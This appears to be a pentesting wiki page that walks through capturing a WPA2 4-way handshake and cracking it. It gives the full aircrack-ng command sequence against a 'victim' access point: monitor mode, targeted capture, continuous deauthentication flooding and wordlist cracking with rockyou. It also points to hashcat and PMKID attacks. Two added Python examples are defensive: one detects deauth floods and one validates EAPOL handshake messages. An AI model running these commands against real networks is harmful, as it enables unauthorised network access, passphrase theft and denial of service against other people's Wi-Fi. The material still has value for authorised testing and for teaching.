WPA Handshake Capture
What is the WPA2 handshake?
The WPA2 handshake (the 4-way handshake) takes place when a client device wants to join a Wi-Fi network secured with WPA2. It is an exchange of four EAPOL messages between the client and the access point (AP) in which both sides prove they hold the same Pairwise Master Key (derived from the passphrase on a PSK network), exchange nonces, and derive fresh session keys for the connection. This keeps unauthorized devices off the network and ensures that data transmitted over it is encrypted, which is why the handshake is a crucial security measure in Wi-Fi networks.
Steps to follow to capture and crack the WPA2 handshake
Kill conflicting processes on the Wi-Fi interface
sudo airmon-ng check kill
Start monitor mode
sudo airmon-ng start [interface]
Get the victim AP's MAC address and channel
sudo airodump-ng [interface]
You can display only the victim AP:
sudo airodump-ng [interface] -d [victim mac address]
Now you should use two different terminal windows:
First window: capture the handshake
sudo airodump-ng -w hack1 -c [victim channel number] --bssid [victim mac address] [interface]
Second window: deauth attack
sudo aireplay-ng --deauth 0 -a [victim mac address] [interface]
Then stop both windows by pressing Ctrl + C.
Use Wireshark to open the hack1 capture file
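The deauth step above is loud: deauthentication frames are unauthenticated management frames, so a wireless IDS does not need to know anything about the attacker to notice dozens of them per second apparently coming from the AP's own BSSID. The following added example (not part of the original page, not aircrack-ng code) parses minimal 802.11 management frames and flags any transmitter whose deauth rate exceeds a threshold inside a sliding time window. All addresses, timestamps and frames are constructed in the script itself; `FLOOD_THRESHOLD` and `WINDOW_SECONDS` are assumed tuning values, not standard constants.

```python
import struct
from collections import deque

# Constructed addresses (locally administered, not real devices).
AP_BSSID  = bytes.fromhex("020000000001")
OTHER_AP  = bytes.fromhex("020000000002")
CLIENT    = bytes.fromhex("02000000aa01")
BROADCAST = b"\xff" * 6

DEAUTH_SUBTYPE_BYTE = 0xC0   # frame control byte 0: type 0 (management), subtype 12 (deauth)
BEACON_SUBTYPE_BYTE = 0x80   # type 0, subtype 8 (beacon)
FLOOD_THRESHOLD = 10         # assumed: this many deauths from one transmitter ...
WINDOW_SECONDS = 1.0         # ... inside this many seconds raises an alert

def mgmt_frame(subtype_byte, addr1, addr2, addr3, body=b""):
    """Build a minimal 802.11 management frame (no radiotap header, no FCS)."""
    header = struct.pack("<BBH6s6s6sH", subtype_byte, 0x00, 0, addr1, addr2, addr3, 0)
    return header + body

def deauth_frame(bssid, station, reason=7):
    """Deauth from bssid to station; the body is just the 16-bit reason code."""
    return mgmt_frame(DEAUTH_SUBTYPE_BYTE, station, bssid, bssid, struct.pack("<H", reason))

def parse_mgmt(frame):
    """Return (subtype_byte, addr1, addr2, addr3) for a management frame, else None."""
    if len(frame) < 24 or (frame[0] & 0x0C) != 0x00:   # bits 2-3 of byte 0 = frame type
        return None
    return frame[0] & 0xFC, frame[4:10], frame[10:16], frame[16:22]

def is_deauth(frame):
    parsed = parse_mgmt(frame)
    return parsed is not None and parsed[0] == DEAUTH_SUBTYPE_BYTE

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def detect_deauth_flood(capture, threshold=FLOOD_THRESHOLD, window=WINDOW_SECONDS):
    """capture: iterable of (timestamp_seconds, raw_frame) in time order.
    Returns {transmitter_mac: peak_count} for every transmitter that sent at
    least `threshold` deauth frames inside any `window`-second span."""
    recent = {}   # transmitter -> deque of deauth timestamps still inside the window
    peaks = {}
    for ts, frame in capture:
        if not is_deauth(frame):
            continue
        # addr2 is the transmitter. A spoofing tool sets it to the AP's BSSID,
        # so the detection keys on rate per address, not on address legitimacy.
        tx = mac_str(parse_mgmt(frame)[2])
        q = recent.setdefault(tx, deque())
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peaks[tx] = max(peaks.get(tx, 0), len(q))
    return peaks

def constructed_capture():
    """Constructed monitor-mode traffic: beacons, one legitimate deauth, one flood."""
    frames = []
    for i in range(10):   # beacons every 100 ms from both APs
        frames.append((i * 0.1, mgmt_frame(BEACON_SUBTYPE_BYTE, BROADCAST, AP_BSSID, AP_BSSID)))
        frames.append((i * 0.1 + 0.05, mgmt_frame(BEACON_SUBTYPE_BYTE, BROADCAST, OTHER_AP, OTHER_AP)))
    frames.append((0.42, deauth_frame(OTHER_AP, CLIENT, reason=4)))   # reason 4: inactivity
    for i in range(30):   # 30 broadcast deauths "from" AP_BSSID within 0.3 s
        frames.append((0.5 + i * 0.01, deauth_frame(AP_BSSID, BROADCAST)))
    frames.sort(key=lambda entry: entry[0])
    return frames

if __name__ == "__main__":
    for tx, count in detect_deauth_flood(constructed_capture()).items():
        print(f"deauth flood from {tx}: {count} frames within {WINDOW_SECONDS}s")
```

On the constructed capture the single inactivity deauth from the second AP stays below the threshold, while the burst keyed on the first BSSID is reported with a peak of 30. The real mitigation on the network side is 802.11w (Protected Management Frames), which authenticates deauth and disassociation frames so that spoofed ones are discarded by the client.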
wireshark hack1-01.cap
Filter Wireshark messages for EAPOL to confirm the handshake messages were captured
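What the EAPOL filter shows is the four EAPOL-Key messages of the 4-way handshake, and Wireshark tells them apart from the Key Information flags (Key ACK, Key MIC, Secure, Install) and pairs them up with the replay counter. The following added example (written for this page, not part of the original and not aircrack-ng or Wireshark code) does the same classification on raw EAPOL frames and checks that a capture holds a consistent M1..M4 sequence. The sample frames are constructed with placeholder nonces and MICs; the bit masks and the 0x008a/0x010a/0x13ca/0x030a Key Information values are the standard ones.

```python
import struct

# Key Information bits of the EAPOL-Key descriptor (IEEE 802.11 RSN)
KEY_TYPE_PAIRWISE  = 0x0008
INSTALL            = 0x0040
KEY_ACK            = 0x0080
KEY_MIC            = 0x0100
SECURE             = 0x0200
ENCRYPTED_KEY_DATA = 0x1000
DESC_VERSION_AES   = 0x0002   # descriptor version 2: HMAC-SHA1 MIC, AES key wrap

EAPOL_KEY_TYPE = 3        # EAPOL packet type "Key"
RSN_DESCRIPTOR = 2        # key descriptor type for WPA2/RSN
EAPOL_KEY_MIN_LEN = 99    # 4-byte EAPOL header + 95-byte fixed key descriptor

# Key Information values as they appear in a normal WPA2 4-way handshake
MSG_KEY_INFO = {
    1: KEY_TYPE_PAIRWISE | KEY_ACK | DESC_VERSION_AES,                                          # 0x008a
    2: KEY_TYPE_PAIRWISE | KEY_MIC | DESC_VERSION_AES,                                          # 0x010a
    3: KEY_TYPE_PAIRWISE | INSTALL | KEY_ACK | KEY_MIC | SECURE | ENCRYPTED_KEY_DATA | DESC_VERSION_AES,  # 0x13ca
    4: KEY_TYPE_PAIRWISE | KEY_MIC | SECURE | DESC_VERSION_AES,                                 # 0x030a
}

def classify_eapol_key(eapol):
    """Return 1..4 for the 4-way handshake message this EAPOL-Key frame is,
    or None if it is not a pairwise RSN handshake message."""
    if len(eapol) < EAPOL_KEY_MIN_LEN or eapol[1] != EAPOL_KEY_TYPE:
        return None
    desc_type, key_info = struct.unpack_from("!BH", eapol, 4)
    if desc_type != RSN_DESCRIPTOR or not key_info & KEY_TYPE_PAIRWISE:
        return None
    ack, mic, secure = (bool(key_info & flag) for flag in (KEY_ACK, KEY_MIC, SECURE))
    if ack and not mic:                  # AP -> client, carries the ANonce
        return 1
    if mic and not ack and not secure:   # client -> AP, carries the SNonce and a MIC
        return 2
    if ack and mic and secure:           # AP -> client, encrypted GTK, install the PTK
        return 3
    if mic and not ack and secure:       # client -> AP, final confirmation
        return 4
    return None

def replay_counter(eapol):
    """64-bit replay counter; it follows the 1-byte descriptor type, 2-byte
    Key Information and 2-byte Key Length, hence offset 9."""
    return struct.unpack_from("!Q", eapol, 9)[0]

def find_complete_handshake(eapol_frames):
    """Walk EAPOL frames in capture order and return the replay counters
    (m1, m2, m3, m4) of the first consistent handshake, else None.
    M1/M2 share a counter and M3/M4 share a later one."""
    seen = {}
    for frame in eapol_frames:
        msg = classify_eapol_key(frame)
        if msg is None:
            continue
        seen[msg] = replay_counter(frame)
        if msg == 4 and {1, 2, 3}.issubset(seen):
            if seen[1] == seen[2] and seen[3] == seen[4] and seen[3] > seen[1]:
                return seen[1], seen[2], seen[3], seen[4]
    return None

def build_eapol_key(key_info, replay, nonce=b"\x00" * 32, mic=b"\x00" * 16, key_data=b""):
    """Construct an EAPOL-Key frame; used here only to fabricate sample input."""
    descriptor = struct.pack("!BHHQ32s16s8s8s16sH", RSN_DESCRIPTOR, key_info, 16, replay,
                             nonce, b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, mic, len(key_data)) + key_data
    return struct.pack("!BBH", 2, EAPOL_KEY_TYPE, len(descriptor)) + descriptor

def constructed_complete_handshake():
    """Constructed M1..M4 with placeholder nonces and MICs (not real crypto output)."""
    return [
        build_eapol_key(MSG_KEY_INFO[1], 0, nonce=b"A" * 32),
        build_eapol_key(MSG_KEY_INFO[2], 0, nonce=b"S" * 32, mic=b"M" * 16, key_data=b"\x30\x00"),
        build_eapol_key(MSG_KEY_INFO[3], 1, nonce=b"A" * 32, mic=b"M" * 16, key_data=b"\xdd" * 56),
        build_eapol_key(MSG_KEY_INFO[4], 1, mic=b"M" * 16),
    ]

def constructed_partial_handshake():
    """Only M1 and M2 were captured, e.g. the client left before finishing."""
    return constructed_complete_handshake()[:2]

if __name__ == "__main__":
    for frame in constructed_complete_handshake():
        print("message", classify_eapol_key(frame), "replay counter", replay_counter(frame))
    print("complete:", find_complete_handshake(constructed_complete_handshake()))
    print("partial:", find_complete_handshake(constructed_partial_handshake()))
```

The same check explains why a capture with only M1 and M2, or with M1 and M3 whose replay counters do not line up, is reported as incomplete: the messages must come from one run of the handshake for the key material in them to belong together.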
Stop monitor mode
sudo airmon-ng stop [interface]
Crack the file with rockyou or another wordlist
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
If you can't crack the file using a wordlist, you can brute force it using Hashcat.
For more details check:
Hashcat Cracking
In case no client is connected to the Wi-Fi, we are obliged to use a PMKID attack:
PMKID Hash Capture
Other YouTube Tutorials
You can check those YouTube Videos/Tutorials about WPA Handshake Capture:
This YouTube Video created by David Bombal
This YouTube Video created by Hak5
This YouTube Video created by InfoSec Pat